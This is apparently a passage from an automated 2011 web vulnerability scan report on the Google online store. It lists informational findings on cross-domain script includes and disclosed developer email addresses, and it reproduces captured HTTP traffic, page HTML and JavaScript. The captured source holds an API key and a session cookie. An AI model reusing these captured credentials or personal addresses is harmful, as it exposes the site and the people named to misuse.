<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Android Pride T-Shirt - Black : Tiki Android T-Shirt');" href="/Wearables/Android+Pride+T-Shirt+-+Black.axd">Android Pride T-Shirt - Black</a>
</li>

</ul>
</div>



   </div>

   <img src="http://int.teracent.net/tase/int?adv=296&fmt=redir&sec=0&pid=prod&prodID=1013119" width="1" height="1" />
</div>
</div>
<div id="right_content">



<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="Template_ctlRightNav_ctlSignup_Label1" class="lblMessage">I want to receive promotional email from GatewayCDI.</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUENTM4MQ9kFgJmD2QWAgIDD2QWAgIFD2QWAmYPZBYCAgEPZBYCAgMPDxYCHghJbWFnZVVybAUWL2ltYWdlcy9idG5fc2lnbnVwLmdpZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBShUZW1wbGF0ZSRjdGxSaWdodE5hdiRjdGxTaWdudXAkYnRuU2lnblVw" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwL5t4CVDgKc3s3hCgKHlcOwBw==" />
</div>
<input name="Template$ctlRightNav$ctlSignup$EmailAddress" type="text" maxlength="50" id="Template_ctlRightNav_ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="Template$ctlRightNav$ctlSignup$btnSignUp" id="Template_ctlRightNav_ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round">
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>
<div class="center-content">
<ul class="store-links">
<li><a href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (40)</a></li>

<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>

</ul>

<ul>

<li><a href="/googlesearch.aspx?topseller=yes">Top Sellers</a></li>
<li><a href="/googlesearch.aspx?isnew=yes">What's New</a></li>
<li><a href="/googlesearch.aspx?category=eco">Eco-Friendly Items</a></li>
<li><a href="/googlesearch.aspx?specials=yes">Specials</a></li>
<li><a href="/Mini/"><b>Google Mini</b></a></li>

</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '23922';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
    </div>
    <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");
</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
var ga = ga || {};
ga.special = 'regular';

ga.isNew = 'no';
ga.isNew = 'yes';

firstTracker._setCustomVar(1, 'price', ga.special, 3);
firstTracker._setCustomVar(2, 'is new', ga.isNew, 3);
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<div id="backgroundPopup"></div>

   </body>
</html>

4.9. http://www.googlestore.com/googlesearch.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/googlesearch.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
http://www.google.com/cse/intl/en-US/sayt.js
http://www.google.com/jsapi
https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
https://www.google.com/cse/intl/en-US/sayt.js
https://www.google.com/jsapi

Request

Response

4.10. http://www.googlestore.com/shop.axd/Home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/shop.axd/Home

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
https://www.google.com/cse/intl/en-US/sayt.js
https://www.google.com/jsapi

Request

GET /shop.axd/Home HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9952
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 18:58:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Google Online Store</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
       <meta name='keywords' content='Google Online Store'/>
       <meta name='description' content='Google Online Store'/>

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
    <link href="/css/main.css" rel="stylesheet" type="text/css" />
    <link href="/css/home.css" rel="stylesheet" type="text/css" />
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

   </head>

   <body>
    <div id="wrapper">
    <div id="home_header">

    <a href="/shop.axd/Home"><img src="/images/toplogo.jpg" alt="GoogleStore" /></a>
        <div style="position:absolute; top:0; right:-40px; z-index:101; width:174px; height:31px;">

        <a href="/googlesearch.aspx?category=you tube"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>

        </div>

<form action="/googlesearch.aspx" id="search" method="get">
<div id="homesearch">
<input style="width:225px; color:#333;" name="q" id="q" autocomplete="off" type="text" class="searchbox" value="keyword / item #" size="15" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" />
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</div>
</form>

    <ul>
    <li><a href="http://www.google.com">Google Search</a></li>
    <li><a href="http://www.google.com/about.html">About Google</a></li>
    </ul>
    </div>


    <div id="home_menu">


<style type="text/css">
#home_images{ position:relative; z-index:0}
#home_slide {
    POSITION: relative;
}
#home_slide div {
    Z-INDEX: 1; LEFT: 0px; POSITION: absolute; TOP: 0px; opacity: 0.0
}
#home_slide div.home_slide_active {
    Z-INDEX: 3; opacity: 1.0
}
#home_slide div.home_slide_last-active {
    Z-INDEX: 2
}
</style>

<ul id="navigation_top_ul"><li><a href=/googlesearch.aspx?category=accessories style="position:relative;">Accessories</a></li><li><a href=/googlesearch.aspx?category=fun style="position:relative;">Fun</a></li><li><a href=/googlesearch.aspx?category=kids style="position:relative;">Kids</a></li><li><a href=/googlesearch.aspx?category=office style="position:relative;">Office</a></li><li><a href=/googlesearch.aspx?category=wearables style="position:relative;">Wearables</a></li><li style="position:relative;"><a onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com HomeNav');return false;" class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." href=http://www.zazzle.com/googledoodles style="position:relative;"><span class='overlay-home'><img src='/content/Icons/NewPilotOverlaySmall.png' alt="" /></span>Doodles on Demand</a></li></ul>

<div id="home_images" style="margin-bottom:25px;">
<div id="left">
<div id="home_slide">
<div class="home_slide_active"><a href="/googlesearch.aspx?isnew=yes"><img src="/images/home/main_1.jpg" alt="" /></a></div><div><a href="/googlesearch.aspx?isnew=yes"><img src="/images/home/main_2.jpg" alt="" /></a></div><div><a href="/googlesearch.aspx?isnew=yes"><img src="/images/home/main_3.jpg" alt="" /></a></div><div><a href="/googlesearch.aspx?isnew=yes"><img src="/images/home/main_4.jpg" alt="" /></a></div>
</div>
</div>
<div id="right">
<div id="top">

<a href="/googlesearch.aspx?category=you tube"><img src="/images/home/tr_yt_2.jpg" alt="" /></a>

</div>
<div id="bottom">
<a href="/googlesearch.aspx?topseller=yes"><img src="/images/home/br_go_3.jpg" alt="" /></a>
</div>
</div>
</div>

<script type="text/javascript">
/*<![CDATA[*/

   function homeSlideSwitch()
   {
       var $active = $('#home_slide div.home_slide_active');

       if ( $active.length == 0 ) $active = $('#home_slide div:last');

       var $next = $active.next().length ? $active.next() : $('#home_slide div:first');

       $active.addClass('home_slide_last-active');

       $next.css({opacity: 0.0})
           .addClass('home_slide_active')
           .animate(
                       {opacity: 1.0},
                       1000,
                       function()
                       {
                           $active.removeClass('home_slide_active home_slide_last-active');
                       }
                   );
   }

   setInterval( "homeSlideSwitch()", 6000 );
/*]]>*/
</script>

</div>

<div id="home_promo">

</div>

<div id="home_content">

<div id="">
</div>


</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
    </div>
    <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");
</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();
</script>

   </body>
</html>

4.11. http://www.googlestore.com/shop.axd/PrivacyPolicy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/shop.axd/PrivacyPolicy

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
https://www.google.com/cse/intl/en-US/sayt.js
https://www.google.com/jsapi

Request

Response

4.12. http://www.googlestore.com/shoppingcart.aspx previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/shoppingcart.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://checkout.google.com/files/digital/ga_post.js

Request

Response

5. Email addresses disclosed previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/js/jquery.dimensions.js

Issue detail

The following email addresses were disclosed in the response:

brandon.aaron@gmail.com
paul.bakaus@googlemail.com

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /js/jquery.dimensions.js HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/shop.axd/Home
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 24 Nov 2010 20:28:56 GMT
Accept-Ranges: bytes
ETag: "687738168ccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 18:58:59 GMT
Content-Length: 3567

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastChangedDate: 2007-12-20 08:46:55 -0600 (Thu, 20 Dec 2007) $
* $Rev: 4259 $
*
* Version: 1.2
*
* Requires: jQuery 1.2+
*/

(function($){

$.dimensions = {
   version: '1.2'
};

// Create innerHeight, innerWidth, outerHeight and outerWidth methods
$.each( [ 'Height', 'Width' ], function(i, name){

   // innerHeight and innerWidth
   $.fn[ 'inner' + name ] = function() {
       if (!this[0]) return;

       var torl = name == 'Height' ? 'Top' : 'Left', // top or left
        borr = name == 'Height' ? 'Bottom' : 'Right'; // bottom or right

       return this.is(':visible') ? this[0]['client' + name] : num( this, name.toLowerCase() ) + num(this, 'padding' + torl) + num(this, 'padding' + borr);
   };

   // outerHeight and outerWidth
   $.fn[ 'outer' + name ] = function(options) {
       if (!this[0]) return;

       var torl = name == 'Height' ? 'Top' : 'Left', // top or left
        borr = name == 'Height' ? 'Bottom' : 'Right'; // bottom or right

       options = $.extend({ margin: false }, options || {});

       var val = this.is(':visible') ?
               this[0]['offset' + name] :
               num( this, name.toLowerCase() )
                   + num(this, 'border' + torl + 'Width') + num(this, 'border' + borr + 'Width')
                   + num(this, 'padding' + torl) + num(this, 'padding' + borr);

       return val + (options.margin ? (num(this, 'margin' + torl) + num(this, 'margin' + borr)) : 0);
   };
});

// Create scrollLeft and scrollTop methods
$.each( ['Left', 'Top'], function(i, name) {
   $.fn[ 'scroll' + name ] = function(val) {
       if (!this[0]) return;

       return val != undefined ?

           // Set the scroll offset
           this.each(function() {
               this == window || this == document ?
                   window.scrollTo(
                       name == 'Left' ? val : $(window)[ 'scrollLeft' ](),
                       name == 'Top' ? val : $(window)[ 'scrollTop' ]()
                   ) :
                   this[ 'scroll' + name ] = val;
           }) :

           // Return the scroll offset
           this[0] == window || this[0] == document ?
               self[ (name == 'Left' ? 'pageXOffset' : 'pageYOffset') ] ||
                   $.boxModel && document.documentElement[ 'scroll' + name ] ||
                   document.body[ 'scroll' + name ] :
               this[0][ 'scroll' + name ];
   };
});

$.fn.extend({
   position: function() {
       var left = 0, top = 0, elem = this[0], offset, parentOffset, offsetParent, results;

       if (elem) {
           // Get *real* offsetParent
           offsetParent = this.offsetParent();

           // Get correct offsets
           offset = this.offset();
           parentOffset = offsetParent.offset();

           // Subtract element margins
           offset.top -= num(elem, 'marginTop');
           offset.left -= num(elem, 'marginLeft');

           // Add offsetParent borders
           parentOffset.top += num(offsetParent, 'borderTopWidth');
           parentOffset.left += num(offsetParent, 'borderLeftWidth');

           // Subtract the two offsets
           results = {
               top: offset.top - parentOffset.top,
               left: offset.left - parentOffset.left
           };
       }

       return results;
   },

   offsetParent: function() {
       var offsetParent = this[0].offsetParent;
       while ( offsetParent && (!/^body|html$/i.test(offsetParent.tagName) && $.css(offsetParent, 'position') == 'static') )
           offsetParent = offsetParent.offsetParent;
       return $(offsetParent);
   }
});

function num(el, prop) {
   return parseInt($.curCSS(el.jquery?el[0]:el,prop,true))||0;
};

})(jQuery);

Report generated by XSS.CX at Fri Oct 21 14:38:47 CDT 2011.